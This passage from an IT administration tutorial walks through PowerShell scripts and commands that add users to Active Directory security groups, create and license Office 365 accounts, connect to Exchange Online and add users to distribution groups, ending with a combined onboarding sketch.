  8. Now that we have our CN security group names, we can add the user(s) into the groups with the following script. For this step we can utilize the script found here: https://community.spiceworks.com/topic/459481-adding-users-to-multiple-security-groups-in-ad – which was contributed by Martin9700 . Copy the following script into a new PowerShell ISE tab and name the file Add-MultipleGroups.ps1 :
    #requires -Version 3.0
    Param (
        [Parameter(Mandatory,ValueFromPipeline)]
        [String[]]$Groups,
        [Parameter(Mandatory)]
        [String[]]$Users,
        [switch]$Passthru
    )
    
    Begin {
        Try { Import-Module ActiveDirectory -ErrorAction Stop }
        Catch { Write-Error "Unable to load Active Directory module, is RSAT installed?"; Exit }
        $Result = @()
    }
    
    Process {
        ForEach ($Group in $Groups)
        {   Try {
                Add-ADGroupMember $Group -Members $Users -ErrorAction Stop
                $Result += [PSCustomObject]@{
                    Group = $Group
                    AddMembers = $Users -join ", "
                }
            }
            Catch {
                Write-Error "Error adding members to $Group because $($Error[0])"
                $Result += [PSCustomObject]@{
                    Group = $Group
                    AddMembers = $Error[0]
                }
            }
        }
    }
    
    End {
        If ($Passthru)
        {   $Result
        }
    }

     

  9. Run the following command to add user to the appropriate security groups:
PS C:\newusers> .\Add-MultipleGroups.ps1 -Groups "CN=ITGroup,CN=Users,DC=intranet,DC=contoso,DC=com","CN=OperationsGroup,CN=Users,DC=intranet,DC=contoso,DC=com" -users user1, user2

The script supports a number of different invocation styles as well, such as the following.

You can just put the group names in -Groups:

.\Add-MultipleGroups.ps1 -Groups "testgroup1","testgroup2" -users user1,user2,user3,user4

You can use a text file (either in Groups or via pipeline):

.\Add-MultipleGroups.ps1 -Groups (Get-Content c:\groups.txt) -Users user1,user2,user3,user4

Get-Content c:\groups.txt | .\Add-MultipleGroups.ps1 -Users user1,user2,user3,user4

You can also use Get-Content for the users list while piping the groups:

Get-Content c:\groups.txt | .\Add-MultipleGroups.ps1 -Users (Get-Content c:\users.txt)

 

You can confirm in ADUC that the users are now members of the security groups in our groups.txt file.

Add users to Office 365 and Distribution Groups with PowerShell

Great! Now that we have our user accounts created on the AD side of things, we will move on to adding our user(s) into Office365:

With PowerShell up and running, we will issue the following commands:

From https://www.petri.com/use-powershell-create-assign-licenses-office-365-users

Import-Module MSOnline

Connect-MsolService

Now we will create the user with the following command:

New-MsolUser -UserPrincipalName user1@contoso.com -DisplayName 'User 1' -FirstName User -LastName 1

This command will return something like the following:

 

PS C:\Users\jcoltrin> New-MsolUser -UserPrincipalName user1@contoso.com -DisplayName 'User 1' -FirstName User -LastName 1

Password    UserPrincipalName    DisplayName    isLicensed
--------    -----------------    -----------    ----------
Suso4007    user1@contoso.com    User 1         False

 

Now we need to add a license to the user account. We need to do two things before we can assign the license: first, determine the different SKUs we have available to license; second, set the usage location. To accomplish the first part, we can issue the command:

Get-MsolAccountSku

Second, by using the instructions here: https://social.technet.microsoft.com/Forums/ie/en-US/bfde2a73-579c-409b-a7cd-77110048c7b7/license-enabling-script?forum=onlineservicesadministrationcenter

We can set the MS Online user’s usage location and then assign the license:

Set-MsolUser -UserPrincipalName user1@contoso.com -UsageLocation US

Set-MsolUserLicense -UserPrincipalName user1@contoso.com -AddLicenses Contoso:STANDARDPACK

Now that the user is licensed, we will add the account to a few Exchange distribution groups. We will need to import a new PSSession before we can run the Exchange commands. Do this by first creating a function called “Connect-O365” (just like we created the find-dn function above):

function Connect-O365{
 $o365cred = Get-Credential username@domain.onmicrosoft.com
 $session365 = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri "https://ps.outlook.com/powershell/" -Credential $o365cred -Authentication Basic -AllowRedirection 
 Import-Module (Import-PSSession $session365 -AllowClobber) -Global
}

Save this as Connect-O365.ps1, dot-source it to load the function into your session, and then run it:

. .\Connect-O365.ps1
Connect-O365

(enter creds)

Now we can add the distribution group members with the group identity and member name in quotes:

 

Add-DistributionGroupMember -Identity "Finance" -Member "user1@contoso.com"

Add-DistributionGroupMember -Identity "AllEmployees" -Member "user1@contoso.com"

A number of these scripts and commands can be combined into .ps1 files to optimize the workflow even further; a rough combined sketch follows. With the information here you should have a good place to start. Let me know in the comments how you added your own features to the procedure.
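As a sketch of what that combined .ps1 might look like – user1 and the group/SKU names are placeholders carried over from the examples above, not a tested script:

# onboard-user.ps1 - combine the steps above into one workflow (sketch)
.\create_ad_users.ps1                                   # create the AD account from the .csv
.\Add-MultipleGroups.ps1 -Groups (Get-Content C:\newusers\groups.txt) -Users user1
Connect-MsolService                                     # Office 365 side
New-MsolUser -UserPrincipalName user1@contoso.com -DisplayName 'User 1' -FirstName User -LastName 1
Set-MsolUser -UserPrincipalName user1@contoso.com -UsageLocation US
Set-MsolUserLicense -UserPrincipalName user1@contoso.com -AddLicenses Contoso:STANDARDPACK
. .\Connect-O365.ps1; Connect-O365                      # Exchange Online session
Add-DistributionGroupMember -Identity "AllEmployees" -Member "user1@contoso.com"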